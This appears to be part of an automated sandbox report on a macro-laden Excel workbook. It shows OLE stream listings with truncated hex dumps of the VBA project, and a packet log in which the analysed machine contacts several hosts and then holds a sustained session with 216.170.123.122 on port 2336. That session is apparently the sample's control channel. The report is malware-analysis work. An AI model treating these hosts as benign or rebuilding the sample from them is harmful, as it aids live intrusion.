Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, Stream Size: 68560

General
Stream Path:	Workbook
File Type:	Applesoft BASIC program data
Stream Size:	68560
Entropy:	7.32390233149
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . .
Data Raw:	09 08 10 00 00 06 05 00 a9 1f cd 07 c1 00 01 00 06 04 00 00 87 00 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF, CR line terminators, Stream Size: 637

General
Stream Path:	_VBA_PROJECT_CUR/PROJECT
File Type:	ASCII text, with CRLF, CR line terminators
Stream Size:	637
Entropy:	5.16192696151
Base64 Encoded:	True
Data ASCII:	I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . M o d u l e = M o d u l e 1 . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2
Data Raw:	49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d

Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 128

General
Stream Path:	_VBA_PROJECT_CUR/PROJECTwm
File Type:	data
Stream Size:	128
Entropy:	3.22588715598
Base64 Encoded:	False
Data ASCII:	M o d u l e 1 . M . o . d . u . l . e . 1 . . . T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
Data Raw:	4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 16645

General
Stream Path:	_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	16645
Entropy:	6.23632786651
Base64 Encoded:	False
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
Data Raw:	cc 61 85 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 1455

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_0
File Type:	data
Stream Size:	1455
Entropy:	4.26435718084
Base64 Encoded:	False
Data ASCII:	. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . > . . . . B . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . a . . . . . . . . . . . . .
Data Raw:	93 4b 2a 85 01 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 01 00 00 00 00 00 01 00 02 00 01 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 00 01 00 00 80 00 00 00 80 00 00 00 80 00 00 00 04 00 00 7e 05 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 6c 00 00 7f 00 00 00 00 15 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 254

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_1
File Type:	data
Stream Size:	254
Entropy:	3.90434658979
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . . . . ~ } . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . y v o f g T H e W . . . . . . . . P d u m D i f j c . . . . . . . . W b T n 3 S l M P . . . . . . . . D I z Y h z Y c E . . . . . . . . Z S u D m 6 P N C . . . . . . . . e p F o c q L Y 5 . . . . . . . . E D b Q 3 n g S m . . . . . . . . l q s T Y O r K 6 P . . . . . . .
Data Raw:	72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 01 00 00 7e 7d 00 00 7f 00 00 00 00 0a 00 00 00 09 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff 09 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff ff ff ff ff 03 00 00 09 19 03 00 00 00 00 00 00 31 06 00 00 00 00 00 00 08 00 00 00 00 00 01 00 03 00 00 08 09 00 00 00 79 76 6f 66 67 54 48 65 57 03

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 460

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_2
File Type:	data
Stream Size:	460
Entropy:	2.2992089846
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . 4 . . . 1 . . . . . . . a . . . . . . . Y . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 1e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 03 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 b9 05 00 00 00 00 00 00 e1 05 00 00 00 00 00 00 09 06 00 00 00 00 00 00 ff ff ff ff 91 05 00 00 00 00 00 00 08 00 24 00 34 00 00 00 31 06 00 00 00 00 00 00 61 00 00 00 00 00 01 00 59 06

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 427

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_3
File Type:	data
Stream Size:	427
Entropy:	2.82389677306
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . $ . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . , . A . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . / , . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 0 0 . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 & / 0 . . . .
Data Raw:	72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff 00 00 00 00 40 00 00 00 04 00 24 00 01 01 00 00 00 00 02 00 00 00 03 60 00 00 f5 03 1c 00 ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 1e 2c 00 41 01 00 00 00 00 02 00 01 00 03 60 08 01 f9 03 ff ff ff ff ff ff ff ff ff ff 00 00 00 00 81 00 00 00 00 00 01

Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 610

General
Stream Path:	_VBA_PROJECT_CUR/VBA/dir
File Type:	data
Stream Size:	610
Entropy:	6.44453822482
Base64 Encoded:	True
Data ASCII:	. ^ . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . + j ^ . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
Data Raw:	01 5e b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 f5 2b 6a 5e 0c 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mr 13, 2019 21:17:46.085319042 MEZ	54991	53	192.168.1.16	8.8.8.8
Mr 13, 2019 21:17:46.122653008 MEZ	53	54991	8.8.8.8	192.168.1.16
Mr 13, 2019 21:17:46.218472004 MEZ	49222	80	192.168.1.16	67.199.248.14
Mr 13, 2019 21:17:46.327385902 MEZ	80	49222	67.199.248.14	192.168.1.16
Mr 13, 2019 21:17:46.327522039 MEZ	49222	80	192.168.1.16	67.199.248.14
Mr 13, 2019 21:17:46.328686953 MEZ	49222	80	192.168.1.16	67.199.248.14
Mr 13, 2019 21:17:46.435868979 MEZ	80	49222	67.199.248.14	192.168.1.16
Mr 13, 2019 21:17:46.436212063 MEZ	80	49222	67.199.248.14	192.168.1.16
Mr 13, 2019 21:17:46.436243057 MEZ	80	49222	67.199.248.14	192.168.1.16
Mr 13, 2019 21:17:46.436410904 MEZ	49222	80	192.168.1.16	67.199.248.14
Mr 13, 2019 21:17:46.437573910 MEZ	49222	80	192.168.1.16	67.199.248.14
Mr 13, 2019 21:17:46.453646898 MEZ	51176	53	192.168.1.16	8.8.8.8
Mr 13, 2019 21:17:46.482311964 MEZ	53	51176	8.8.8.8	192.168.1.16
Mr 13, 2019 21:17:46.485340118 MEZ	49223	80	192.168.1.16	67.199.248.14
Mr 13, 2019 21:17:46.546200991 MEZ	80	49222	67.199.248.14	192.168.1.16
Mr 13, 2019 21:17:46.593740940 MEZ	80	49223	67.199.248.14	192.168.1.16
Mr 13, 2019 21:17:46.593928099 MEZ	49223	80	192.168.1.16	67.199.248.14
Mr 13, 2019 21:17:46.594960928 MEZ	49223	80	192.168.1.16	67.199.248.14
Mr 13, 2019 21:17:46.702166080 MEZ	80	49223	67.199.248.14	192.168.1.16
Mr 13, 2019 21:17:46.723520041 MEZ	80	49223	67.199.248.14	192.168.1.16
Mr 13, 2019 21:17:46.723750114 MEZ	49223	80	192.168.1.16	67.199.248.14
Mr 13, 2019 21:17:46.760349035 MEZ	49810	53	192.168.1.16	8.8.8.8
Mr 13, 2019 21:17:47.760054111 MEZ	49810	53	192.168.1.16	8.8.8.8
Mr 13, 2019 21:17:47.774808884 MEZ	53	49810	8.8.8.8	192.168.1.16
Mr 13, 2019 21:17:47.777156115 MEZ	49224	443	192.168.1.16	172.217.168.33
Mr 13, 2019 21:17:47.790180922 MEZ	443	49224	172.217.168.33	192.168.1.16
Mr 13, 2019 21:17:47.790306091 MEZ	49224	443	192.168.1.16	172.217.168.33
Mr 13, 2019 21:17:47.830180883 MEZ	49224	443	192.168.1.16	172.217.168.33
Mr 13, 2019 21:17:47.843560934 MEZ	443	49224	172.217.168.33	192.168.1.16
Mr 13, 2019 21:17:47.857635021 MEZ	443	49224	172.217.168.33	192.168.1.16
Mr 13, 2019 21:17:47.857673883 MEZ	443	49224	172.217.168.33	192.168.1.16
Mr 13, 2019 21:17:47.857816935 MEZ	49224	443	192.168.1.16	172.217.168.33
Mr 13, 2019 21:17:47.899050951 MEZ	443	49224	172.217.168.33	192.168.1.16
Mr 13, 2019 21:17:47.899282932 MEZ	49224	443	192.168.1.16	172.217.168.33
Mr 13, 2019 21:17:47.912781000 MEZ	443	49224	172.217.168.33	192.168.1.16
Mr 13, 2019 21:17:47.913024902 MEZ	49224	443	192.168.1.16	172.217.168.33
Mr 13, 2019 21:17:47.941725969 MEZ	49224	443	192.168.1.16	172.217.168.33
Mr 13, 2019 21:17:47.954127073 MEZ	443	49224	172.217.168.33	192.168.1.16
Mr 13, 2019 21:17:47.954297066 MEZ	49224	443	192.168.1.16	172.217.168.33
Mr 13, 2019 21:17:48.732959032 MEZ	49224	443	192.168.1.16	172.217.168.33
Mr 13, 2019 21:17:48.786345005 MEZ	443	49224	172.217.168.33	192.168.1.16
Mr 13, 2019 21:17:49.030988932 MEZ	443	49224	172.217.168.33	192.168.1.16
Mr 13, 2019 21:17:49.031038046 MEZ	443	49224	172.217.168.33	192.168.1.16
Mr 13, 2019 21:17:49.031236887 MEZ	49224	443	192.168.1.16	172.217.168.33
Mr 13, 2019 21:17:49.031888008 MEZ	443	49224	172.217.168.33	192.168.1.16
Mr 13, 2019 21:17:49.031932116 MEZ	443	49224	172.217.168.33	192.168.1.16
Mr 13, 2019 21:17:49.032023907 MEZ	49224	443	192.168.1.16	172.217.168.33
Mr 13, 2019 21:17:49.032632113 MEZ	443	49224	172.217.168.33	192.168.1.16
Mr 13, 2019 21:17:49.032675982 MEZ	443	49224	172.217.168.33	192.168.1.16
Mr 13, 2019 21:17:49.032799006 MEZ	49224	443	192.168.1.16	172.217.168.33
Mr 13, 2019 21:17:49.033442974 MEZ	443	49224	172.217.168.33	192.168.1.16
Mr 13, 2019 21:17:49.033483982 MEZ	443	49224	172.217.168.33	192.168.1.16
Mr 13, 2019 21:17:49.033579111 MEZ	49224	443	192.168.1.16	172.217.168.33
Mr 13, 2019 21:17:49.034461975 MEZ	443	49224	172.217.168.33	192.168.1.16
Mr 13, 2019 21:17:49.034496069 MEZ	443	49224	172.217.168.33	192.168.1.16
Mr 13, 2019 21:17:49.034622908 MEZ	49224	443	192.168.1.16	172.217.168.33
Mr 13, 2019 21:17:49.038316011 MEZ	49224	443	192.168.1.16	172.217.168.33
Mr 13, 2019 21:17:49.074028969 MEZ	55151	53	192.168.1.16	8.8.8.8
Mr 13, 2019 21:17:49.104475021 MEZ	53	55151	8.8.8.8	192.168.1.16
Mr 13, 2019 21:17:49.142412901 MEZ	443	49224	172.217.168.33	192.168.1.16
Mr 13, 2019 21:17:49.142642975 MEZ	49224	443	192.168.1.16	172.217.168.33
Mr 13, 2019 21:17:49.358627081 MEZ	53216	53	192.168.1.16	8.8.8.8
Mr 13, 2019 21:17:49.388880968 MEZ	53	53216	8.8.8.8	192.168.1.16
Mr 13, 2019 21:17:56.370340109 MEZ	49792	53	192.168.1.16	8.8.8.8
Mr 13, 2019 21:17:56.382875919 MEZ	53	49792	8.8.8.8	192.168.1.16
Mr 13, 2019 21:17:56.430022955 MEZ	49229	443	192.168.1.16	104.20.208.21
Mr 13, 2019 21:17:56.442439079 MEZ	443	49229	104.20.208.21	192.168.1.16
Mr 13, 2019 21:17:56.442569017 MEZ	49229	443	192.168.1.16	104.20.208.21
Mr 13, 2019 21:17:56.474795103 MEZ	49229	443	192.168.1.16	104.20.208.21
Mr 13, 2019 21:17:56.488353968 MEZ	443	49229	104.20.208.21	192.168.1.16
Mr 13, 2019 21:17:56.492475986 MEZ	443	49229	104.20.208.21	192.168.1.16
Mr 13, 2019 21:17:56.492526054 MEZ	443	49229	104.20.208.21	192.168.1.16
Mr 13, 2019 21:17:56.492552042 MEZ	443	49229	104.20.208.21	192.168.1.16
Mr 13, 2019 21:17:56.492577076 MEZ	443	49229	104.20.208.21	192.168.1.16
Mr 13, 2019 21:17:56.492597103 MEZ	443	49229	104.20.208.21	192.168.1.16
Mr 13, 2019 21:17:56.492624044 MEZ	49229	443	192.168.1.16	104.20.208.21
Mr 13, 2019 21:17:56.493819952 MEZ	49229	443	192.168.1.16	104.20.208.21
Mr 13, 2019 21:17:56.507167101 MEZ	49229	443	192.168.1.16	104.20.208.21
Mr 13, 2019 21:17:56.519292116 MEZ	443	49229	104.20.208.21	192.168.1.16
Mr 13, 2019 21:17:56.722621918 MEZ	80	49223	67.199.248.14	192.168.1.16
Mr 13, 2019 21:17:56.722742081 MEZ	49223	80	192.168.1.16	67.199.248.14
Mr 13, 2019 21:17:56.736706972 MEZ	443	49229	104.20.208.21	192.168.1.16
Mr 13, 2019 21:17:56.736819029 MEZ	49229	443	192.168.1.16	104.20.208.21
Mr 13, 2019 21:17:56.951735020 MEZ	49229	443	192.168.1.16	104.20.208.21
Mr 13, 2019 21:17:57.004858017 MEZ	443	49229	104.20.208.21	192.168.1.16
Mr 13, 2019 21:17:57.211262941 MEZ	443	49229	104.20.208.21	192.168.1.16
Mr 13, 2019 21:17:57.211302042 MEZ	443	49229	104.20.208.21	192.168.1.16
Mr 13, 2019 21:17:57.211385965 MEZ	443	49229	104.20.208.21	192.168.1.16
Mr 13, 2019 21:17:57.211405039 MEZ	49229	443	192.168.1.16	104.20.208.21
Mr 13, 2019 21:17:57.211419106 MEZ	443	49229	104.20.208.21	192.168.1.16
Mr 13, 2019 21:17:57.211462021 MEZ	443	49229	104.20.208.21	192.168.1.16
Mr 13, 2019 21:17:57.211486101 MEZ	443	49229	104.20.208.21	192.168.1.16
Mr 13, 2019 21:17:57.211509943 MEZ	443	49229	104.20.208.21	192.168.1.16
Mr 13, 2019 21:17:57.211529970 MEZ	443	49229	104.20.208.21	192.168.1.16
Mr 13, 2019 21:17:57.211558104 MEZ	443	49229	104.20.208.21	192.168.1.16
Mr 13, 2019 21:17:57.211580038 MEZ	443	49229	104.20.208.21	192.168.1.16
Mr 13, 2019 21:17:57.211584091 MEZ	49229	443	192.168.1.16	104.20.208.21
Mr 13, 2019 21:17:57.211610079 MEZ	443	49229	104.20.208.21	192.168.1.16
Mr 13, 2019 21:17:57.211632967 MEZ	443	49229	104.20.208.21	192.168.1.16
Mr 13, 2019 21:17:57.211657047 MEZ	443	49229	104.20.208.21	192.168.1.16
Mr 13, 2019 21:17:57.211677074 MEZ	49229	443	192.168.1.16	104.20.208.21
Mr 13, 2019 21:17:57.211684942 MEZ	443	49229	104.20.208.21	192.168.1.16
Mr 13, 2019 21:17:57.211746931 MEZ	49229	443	192.168.1.16	104.20.208.21
Mr 13, 2019 21:17:57.211874962 MEZ	49229	443	192.168.1.16	104.20.208.21
Mr 13, 2019 21:17:57.212169886 MEZ	443	49229	104.20.208.21	192.168.1.16
Mr 13, 2019 21:17:57.212204933 MEZ	443	49229	104.20.208.21	192.168.1.16
Mr 13, 2019 21:17:57.212806940 MEZ	49229	443	192.168.1.16	104.20.208.21
Mr 13, 2019 21:17:57.213430882 MEZ	443	49229	104.20.208.21	192.168.1.16
Mr 13, 2019 21:17:57.213470936 MEZ	443	49229	104.20.208.21	192.168.1.16
Mr 13, 2019 21:17:57.213550091 MEZ	49229	443	192.168.1.16	104.20.208.21
Mr 13, 2019 21:17:57.214452028 MEZ	443	49229	104.20.208.21	192.168.1.16
Mr 13, 2019 21:17:57.214493036 MEZ	443	49229	104.20.208.21	192.168.1.16
Mr 13, 2019 21:17:57.214520931 MEZ	443	49229	104.20.208.21	192.168.1.16
Mr 13, 2019 21:17:57.214525938 MEZ	49229	443	192.168.1.16	104.20.208.21
Mr 13, 2019 21:17:57.214550972 MEZ	443	49229	104.20.208.21	192.168.1.16
Mr 13, 2019 21:17:57.214618921 MEZ	49229	443	192.168.1.16	104.20.208.21
Mr 13, 2019 21:17:57.215876102 MEZ	443	49229	104.20.208.21	192.168.1.16
Mr 13, 2019 21:17:57.215917110 MEZ	443	49229	104.20.208.21	192.168.1.16
Mr 13, 2019 21:17:57.215996027 MEZ	49229	443	192.168.1.16	104.20.208.21
Mr 13, 2019 21:17:57.217268944 MEZ	443	49229	104.20.208.21	192.168.1.16
Mr 13, 2019 21:17:57.217308998 MEZ	443	49229	104.20.208.21	192.168.1.16
Mr 13, 2019 21:17:57.217391968 MEZ	49229	443	192.168.1.16	104.20.208.21
Mr 13, 2019 21:17:58.580399990 MEZ	50672	53	192.168.1.16	8.8.8.8
Mr 13, 2019 21:17:58.614438057 MEZ	53	50672	8.8.8.8	192.168.1.16
Mr 13, 2019 21:17:58.615453005 MEZ	49230	2336	192.168.1.16	216.170.123.122
Mr 13, 2019 21:17:58.746444941 MEZ	2336	49230	216.170.123.122	192.168.1.16
Mr 13, 2019 21:17:58.746562004 MEZ	49230	2336	192.168.1.16	216.170.123.122
Mr 13, 2019 21:17:58.878923893 MEZ	2336	49230	216.170.123.122	192.168.1.16
Mr 13, 2019 21:17:59.114909887 MEZ	49230	2336	192.168.1.16	216.170.123.122
Mr 13, 2019 21:17:59.485194921 MEZ	2336	49230	216.170.123.122	192.168.1.16
Mr 13, 2019 21:18:02.713618040 MEZ	2336	49230	216.170.123.122	192.168.1.16
Mr 13, 2019 21:18:02.963078976 MEZ	49230	2336	192.168.1.16	216.170.123.122
Mr 13, 2019 21:18:03.101068974 MEZ	49230	2336	192.168.1.16	216.170.123.122
Mr 13, 2019 21:18:03.759365082 MEZ	49230	2336	192.168.1.16	216.170.123.122
Mr 13, 2019 21:18:03.886748075 MEZ	2336	49230	216.170.123.122	192.168.1.16
Mr 13, 2019 21:18:07.307842970 MEZ	54414	53	192.168.1.16	8.8.8.8
Mr 13, 2019 21:18:07.313368082 MEZ	61734	53	192.168.1.16	8.8.8.8
Mr 13, 2019 21:18:07.321567059 MEZ	53	54414	8.8.8.8	192.168.1.16
Mr 13, 2019 21:18:07.326215029 MEZ	53	61734	8.8.8.8	192.168.1.16
Mr 13, 2019 21:18:08.441965103 MEZ	2336	49230	216.170.123.122	192.168.1.16
Mr 13, 2019 21:18:08.453929901 MEZ	49230	2336	192.168.1.16	216.170.123.122
Mr 13, 2019 21:18:08.783665895 MEZ	2336	49230	216.170.123.122	192.168.1.16
Mr 13, 2019 21:18:08.783730030 MEZ	49230	2336	192.168.1.16	216.170.123.122
Mr 13, 2019 21:18:09.113073111 MEZ	2336	49230	216.170.123.122	192.168.1.16
Mr 13, 2019 21:18:12.680579901 MEZ	49223	80	192.168.1.16	67.199.248.14
Mr 13, 2019 21:18:12.680815935 MEZ	49224	443	192.168.1.16	172.217.168.33
Mr 13, 2019 21:18:17.908394098 MEZ	2336	49230	216.170.123.122	192.168.1.16
Mr 13, 2019 21:18:17.927953959 MEZ	49230	2336	192.168.1.16	216.170.123.122
Mr 13, 2019 21:18:18.056528091 MEZ	2336	49230	216.170.123.122	192.168.1.16
Mr 13, 2019 21:18:18.066935062 MEZ	49230	2336	192.168.1.16	216.170.123.122
Mr 13, 2019 21:18:18.390424013 MEZ	2336	49230	216.170.123.122	192.168.1.16
Mr 13, 2019 21:18:18.390552044 MEZ	49230	2336	192.168.1.16	216.170.123.122
Mr 13, 2019 21:18:18.801243067 MEZ	2336	49230	216.170.123.122	192.168.1.16
Mr 13, 2019 21:18:28.037341118 MEZ	55067	53	192.168.1.16	8.8.8.8
Mr 13, 2019 21:18:28.049468040 MEZ	53	55067	8.8.8.8	192.168.1.16
Mr 13, 2019 21:18:29.073802948 MEZ	64117	53	192.168.1.16	8.8.8.8
Mr 13, 2019 21:18:29.100644112 MEZ	53	64117	8.8.8.8	192.168.1.16
Mr 13, 2019 21:18:33.549041986 MEZ	2336	49230	216.170.123.122	192.168.1.16
Mr 13, 2019 21:18:33.638875008 MEZ	49230	2336	192.168.1.16	216.170.123.122
Mr 13, 2019 21:18:33.965100050 MEZ	2336	49230	216.170.123.122	192.168.1.16
Mr 13, 2019 21:18:33.971750021 MEZ	2336	49230	216.170.123.122	192.168.1.16
Mr 13, 2019 21:18:34.011203051 MEZ	49230	2336	192.168.1.16	216.170.123.122
Mr 13, 2019 21:18:34.370640993 MEZ	2336	49230	216.170.123.122	192.168.1.16
Mr 13, 2019 21:18:34.370973110 MEZ	49230	2336	192.168.1.16	216.170.123.122
Mr 13, 2019 21:18:34.774070978 MEZ	2336	49230	216.170.123.122	192.168.1.16
Mr 13, 2019 21:18:48.368978024 MEZ	2336	49230	216.170.123.122	192.168.1.16
Mr 13, 2019 21:18:48.449497938 MEZ	49230	2336	192.168.1.16	216.170.123.122
Mr 13, 2019 21:18:48.576873064 MEZ	2336	49230	216.170.123.122	192.168.1.16
Mr 13, 2019 21:18:48.622349024 MEZ	49230	2336	192.168.1.16	216.170.123.122
Mr 13, 2019 21:18:48.992130041 MEZ	2336	49230	216.170.123.122	192.168.1.16
Mr 13, 2019 21:18:48.992203951 MEZ	49230	2336	192.168.1.16	216.170.123.122
Mr 13, 2019 21:18:49.393182993 MEZ	2336	49230	216.170.123.122	192.168.1.16
Mr 13, 2019 21:19:03.565926075 MEZ	2336	49230	216.170.123.122	192.168.1.16
Mr 13, 2019 21:19:03.567075014 MEZ	49230	2336	192.168.1.16	216.170.123.122
Mr 13, 2019 21:19:03.694612980 MEZ	2336	49230	216.170.123.122	192.168.1.16
Mr 13, 2019 21:19:03.701848030 MEZ	49230	2336	192.168.1.16	216.170.123.122
Mr 13, 2019 21:19:04.077559948 MEZ	2336	49230	216.170.123.122	192.168.1.16
Mr 13, 2019 21:19:04.077631950 MEZ	49230	2336	192.168.1.16	216.170.123.122
Mr 13, 2019 21:19:04.498769999 MEZ	2336	49230	216.170.123.122	192.168.1.16

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mr 13, 2019 21:17:46.085319042 MEZ	54991	53	192.168.1.16	8.8.8.8
Mr 13, 2019 21:17:46.122653008 MEZ	53	54991	8.8.8.8	192.168.1.16
Mr 13, 2019 21:17:46.453646898 MEZ	51176	53	192.168.1.16	8.8.8.8
Mr 13, 2019 21:17:46.482311964 MEZ	53	51176	8.8.8.8	192.168.1.16
Mr 13, 2019 21:17:46.760349035 MEZ	49810	53	192.168.1.16	8.8.8.8
Mr 13, 2019 21:17:47.760054111 MEZ	49810	53	192.168.1.16	8.8.8.8
